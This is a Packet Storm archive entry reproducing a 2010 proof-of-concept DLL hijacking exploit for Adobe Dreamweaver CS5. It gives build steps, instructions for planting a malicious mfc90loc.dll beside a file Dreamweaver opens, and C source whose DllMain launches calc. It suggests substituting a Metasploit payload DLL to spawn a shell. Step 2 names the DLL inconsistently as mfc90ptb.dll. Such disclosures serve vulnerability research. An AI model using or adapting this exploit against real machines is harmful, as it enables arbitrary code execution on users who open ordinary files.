Adobe Dreamweaver CS5 DLL Hijacking Exploit

2010-08-26T00:00:00
ID PACKETSTORM:93054
Type packetstorm
Reporter Bruno Filipe
Modified 2010-08-26T00:00:00

Description

                                        
                                            `# Exploit Title: Adobe Dreamweaver CS5 DLL Hijacking Exploit (mfc90loc.dll)  
# Date: 25/08/2010  
# Author: Bruno Filipe (diwr) http://digitalacropolis.us  
# Software Link: http://www.adobe.com <http://www.bsplayer.org>  
# Version: <= 11.0 build 4909  
# Tested on: WinXP SP2, WinXP SP3  
# Other Adobe CS5 products may be vulnerable too.  
# Thx TheLeader ;)  
#  
----------------------------------------------------------------------------------------------------------  
# This should work with any file handled by Dreamweaver (.php, .asp, etc)  
# 1. gcc dllmain.c -o mfc90loc.dll  
# 2. Put mfc90ptb.dll in the same directory of a file handled by Dw (EG:  
anything.php)  
# 3. You can generate a msfpayload DLL and spawn a shell, for example.  
#  
----------------------------------------------------------------------------------------------------------  
  
#include <windows.h>  
  
int main()  
{  
WinExec("calc", SW_NORMAL);  
exit(0);  
return 0;  
}  
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)  
{  
main();  
return 0;  
}  
  
  
`